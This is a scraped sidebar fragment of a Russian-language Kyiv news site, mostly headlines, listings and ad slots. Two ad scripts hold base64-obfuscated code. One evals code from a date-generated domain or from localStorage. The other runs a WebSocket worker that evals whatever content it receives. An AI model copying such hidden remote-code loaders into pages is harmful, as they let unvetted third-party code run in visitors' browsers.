class="view"><span><i></i>2962</span></td><td class="view"><span><i></i>2871</span></td><td class="view last"><span><i></i>2288</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1610-v-rf-proizoshel-pozhar-na-baze-chvk-vagnera"><img width="142" height="88" alt="В РФ произошел пожар на базе ЧВК Вагнера" src="https://enovosty.com/wp-content/uploads/2019/10/2019-10-16-6.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1610-v-rf-proizoshel-pozhar-na-baze-chvk-vagnera">В РФ произошел пожар на базе ЧВК Вагнера</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/1610-ukrainskoj-delegacii-v-minske-prodemonstrirovala-mudrost-i-vzveshennyj-podxod-irina-gerashhenko-video"><img width="142" height="88" alt="Украинская делегация в Минске продемонстрировала мудрость и взвешенный подход, - Ирина Геращенко" src="https://enovosty.com/wp-content/uploads/2019/10/geraschenko.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1610-ukrainskoj-delegacii-v-minske-prodemonstrirovala-mudrost-i-vzveshennyj-podxod-irina-gerashhenko-video">Украинская делегация в Минске продемонстрировала мудрость и взвешенный подход, - Ирина Геращенко</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_technology/full/1610-v-ssha-razrabotali-bespilotnyj-tank-kotorogo-prakticheski-ne-slyshno-video"><img width="142" height="88" alt="В США разработали беспилотный танк, которого практически не слышно" src="https://enovosty.com/wp-content/uploads/2019/10/7.5_compressed_0-e1571245795692.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_technology/full/1610-v-ssha-razrabotali-bespilotnyj-tank-kotorogo-prakticheski-ne-slyshno-video">В США разработали беспилотный танк, которого практически не слышно</a></div></td></tr><tr><td class="view"><span><i></i>1982</span></td><td class="view"><span><i></i>1754</span></td><td class="view last"><span><i></i>1679</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/3004-sergej-petrik-rasskazal-kak-sovremennye-mobilnye-prilozheniya-oblegchayut-zhizn-kievlyanam-i-gostyam-stolicy" rel="bookmark">Сергей Петрик рассказал, как современные мобильные приложения облегчают жизнь киевлянам и гостям столицы</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news-finance/full/1902-oplata-proezda-v-transporte-s-pomoshhyu-sms-i-e-bileta-yavlyaetsya-proryvom-sergej-petrik" rel="bookmark">Оплата проезда в транспорте с помощью SMS и е-билета является прорывом, - Сергей Петрик</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script><br><script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4777385" class="postafisha"><span class="region">Киев 24&#160;октября</span><div class="aimg"><a href="https://enovosty.com/kino/full/1510-kinopremera-film-zombilend-dvojnoj-vystrel"><img width="170" height="132" alt="Кинопремьера: фильм «Зомбилэнд: Двойной ..." src="/wp-content/uploads/2019/10/postril.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1510-kinopremera-film-zombilend-dvojnoj-vystrel">Кинопремьера: фильм «Зомбилэнд: Двойной ...</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4777381" class="postafisha"><span class="region">Киев 26&#160;октября</span><div class="aimg"><a href="https://enovosty.com/kino/full/1510-kinopremera-film-klara-i-volshebnyj-drakon"><img width="170" height="132" alt="Кинопремьера: фильм «Клара и волшебный ..." src="/wp-content/uploads/2019/10/klara.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1510-kinopremera-film-klara-i-volshebnyj-drakon">Кинопремьера: фильм «Клара и волшебный ...</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4368177"><a href="https://enovosty.com/armiya/full/744-bespilotnyj-letatelnyj-apparat-bekas" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/06/bekas-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/06/bekas-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/06/bekas-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/06/bekas.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/744-bespilotnyj-letatelnyj-apparat-bekas" >Беспилотный летательный аппарат «Бекас»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4383240"><a href="https://enovosty.com/armiya/full/751-raketno-artillerijskaya-sistema-himars-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/08/HIMARS-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/08/HIMARS-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/08/HIMARS-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/08/HIMARS.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/751-raketno-artillerijskaya-sistema-himars-ssha" >Ракетно-артиллерийская система HIMARS (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4424514"><a href="https://enovosty.com/armiya/full/835-samohodnaya-artillerijskaya-ustanovka-120-mm-semser-izrail" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/02/122mm_kazahstan_semser-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/02/122mm_kazahstan_semser-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/02/122mm_kazahstan_semser-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/02/122mm_kazahstan_semser.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/835-samohodnaya-artillerijskaya-ustanovka-120-mm-semser-izrail" >Самоходная артиллерийская установка 120-мм Semser (Израиль)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4453893"><a href="https://enovosty.com/armiya/full/823-samohodnaya-gaubica-105-mm-type-74-yaponiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/06/Type74-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/06/Type74-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/06/Type74-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/06/Type74.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/823-samohodnaya-gaubica-105-mm-type-74-yaponiya" >Самоходная гаубица 105-мм Type 74 (Япония)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости Киева</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4245,30427', 4245, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4245,30427', 4245, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4245,30427', 4245, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_kiev/full/1710-v-kieve-posredi-oseni-rascveli-sakury">В Киеве посреди осени расцвели сакуры (1653)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1210-avtoritetnoe-izdanie-independent-posovetovalo-britancam-potoropitsya-v-kiev-chem-vyzvan-azhiotazh">Авторитетное издание Independent посоветовало британцам поторопиться в Киев. Чем вызван ажиотаж? (1230)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1210-policejskie-zaderzhali-muzhchinu-zaminirovavshego-most-patona-v-kieve">Полицейские задержали мужчину, «заминировавшего» мост Патона в Киеве (978)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1510-kogda-postroyat-metro-na-troeshhinu-otvet-merii">Когда построят метро на Троещину - ответ мэрии (907)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1810-stalo-izvestno-kogda-zakonchitsya-remont-darnickoj-ploshhadi-v-kieve">Стало известно, когда закончится ремонт Дарницкой площади в Киеве (867)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1410-v-kieve-zavershilsya-masshabnyj-marsh-ni-kapitulyacii-foto">В Киеве завершился масшабный марш "Ні капітуляції!" (ФОТО) (661)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1510-zapret-na-prodazhu-alkogolya-v-stolice-v-voprose-postavlena-tochka">Запрет на продажу алкоголя в столице. В вопросе поставлена точка (331)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1310-s-1-noyabrya-2019-goda-v-nazemnom-transporte-kievpastransa-razreshat-oplachivat-proezd-bankovskimi-kartami">С 1 ноября 2019 года в наземном транспорте «Киевпастранса» разрешат оплачивать проезд банковскими картами (184)</a></h3><h3 class="press"><a href="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom">Сергей Петрик рассказал о мерах борьбы с незаконным строительством (21)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4305211"><a href="https://enovosty.com/person/full/osadchaya-ekaterina" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/07/osadchaya-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/07/osadchaya-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/07/osadchaya.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/osadchaya-ekaterina" >Екатерина<br /> ОСАДЧАЯ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4321006"><a href="https://enovosty.com/person/full/korolevskaya-nataliya" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/10/korolevskaya_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/10/korolevskaya_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/10/korolevskaya_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/korolevskaya-nataliya" >Наталия<br /> КОРОЛЕВСКАЯ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4372307"><a href="https://enovosty.com/person/full/888-cegolko-svyatoslav" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/07/Tsegolko-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/07/Tsegolko-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/Tsegolko.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/888-cegolko-svyatoslav" >Святослав<br /> ЦЕГОЛКО</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4430685"><a href="https://enovosty.com/person/full/155-nemcov-boris" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/02/nemtsov-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/02/nemtsov-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/02/nemtsov.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/155-nemcov-boris" >Борис<br /> НЕМЦОВ</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_politics/full/1810-v-rpc-otomstili-grecheskoj-cerkvi-za-priznanie-avtokefalii-pcu">В РПЦ "отомстили" Греческой церкви за признание автокефалии ПЦУ (3684)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1710-shestiletnyaya-ukrainka-vyigrala-mezhdunarodnyj-konkurs-princessa-mira-2019">Шестилетняя украинка выиграла международный конкурс "Принцесса мира 2019" (3137)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1810-pochemu-erdogan-proigral-osnovnye-oshibki-kotorye-sovershila-turciya-v-svoej-operacii-v-sirii">Почему Эрдоган проиграл: основные ошибки, которые совершила Турция в своей операции в Сирии (3055)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1710-v-ukraine-provedut-proverku-vsex-pensionerov-podrobnosti">В Украине проведут проверку всех пенсионеров: подробности (3030)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/1710-v-kieve-na-xodu-zagorelsya-trollejbus-s-passazhirami">В Киеве на ходу загорелся троллейбус с пассажирами (ФОТО) (2575)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/1810-f-22-stealth-raptor-mozhet-li-on-ostatsya-samym-moshhnym-v-mire-istrebitelem">F-22 Stealth Raptor: может ли он остаться самым мощным в мире истребителем? (2519)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/1710-armiya-ssha-gotovitsya-ispytat-oruzhie-sposobnoe-strelyat-na-rasstoyanie-pochti-2000-km">Армия США готовится испытать оружие, способное стрелять на расстояние почти 2000 км (2217)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1810-putin-uxodit-s-donbassa-analitik-rasskazal-o-vazhnom-signale">Путин уходит с Донбасса? Аналитик рассказал о важном сигнале (2104)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1810-putin-pytaetsya-uderzhat-padayushhie-ceny-na-neft-anti-colorados">Путин пытается удержать падающие цены на нефть, - Аnti-colorados (1962)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/1810-stalo-izvestno-o-sudbe-lgot-dlya-veteranov">Стало известно о судьбе льгот для ветеранов (1922)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id="adriver_banner_C1"></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://plus.google.com/104224979035578149686" rel="nofollow" target="_blank" class="gplus"><i></i></a></td></tr></table></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div id="adriver_banner_C3"></div><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1609-sergej-kaftya-segodnya-v-akvarelyax-komfortnee-zhit-chem-v-bolshinstve-zhk-kieva">Сергей Кафтя: «Сегодня в «Акварелях» комфортнее жить, чем в большинстве ЖК Киева»</a></p><p class="press"><a href="https://enovosty.com/publications/full/2308-kak-programmy-es-i-ebrr-pomogli-proizvoditelyam-mebeli-v-brovarax">Как программы ЕС и ЕБРР помогли производителям мебели в Броварах</a></p></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/1110-eta-bestolkovaya-fiskalizaciya-privedet-tolko-k-uxodu-v-ten-i-k-usileniyu-emigracii"><img alt="Эта бестолковая фискализация приведет только к уходу в тень и к усилению эмиграции" src="https://enovosty.com/wp-content/uploads/2019/10/butusov-112x82.jpg"><div></div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/1110-eta-bestolkovaya-fiskalizaciya-privedet-tolko-k-uxodu-v-ten-i-k-usileniyu-emigracii">Эта бестолковая фискализация приведет только к уходу в тень и к усилению эмиграции</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/1110-eta-bestolkovaya-fiskalizaciya-privedet-tolko-k-uxodu-v-ten-i-k-usileniyu-emigracii">21 год в журналистике наблюдаю за налоговыми реформами и экономическими стратегиями наших президентов.</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/novosti-kompanij">Новости компаний</a></div></div> <p class="press"><a href="https://enovosty.com/novosti-kompanij/full/1406-novostrojki-v-brovarax-kvartal-allej-odin-iz-samyx-perspektivnyx-i-masshtabnyx-proektov-vo-vsej-kievskoj-oblasti">Новостройки в Броварах «Квартал Аллей» — один из самых перспективных и масштабных проектов во всей Киевской области</a></p><p class="press"><a href="https://enovosty.com/novosti-kompanij/full/3005-osobennosti-bojlerov-atlantik">Особенности бойлеров Атлантик</a></p><p class="press"><a href="https://enovosty.com/novosti-kompanij/full/2005-kriterii-vybora-xolodilnika">Критерии выбора холодильника</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><div><a href="https://enovosty.com/markets/full/710-zemlyu-spekulyantam-i-oligarxam-chast-1"><img alt="Землю спекулянтам" src="https://enovosty.com/wp-content/themes/eizvestia/img/Zemlu1.jpg"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 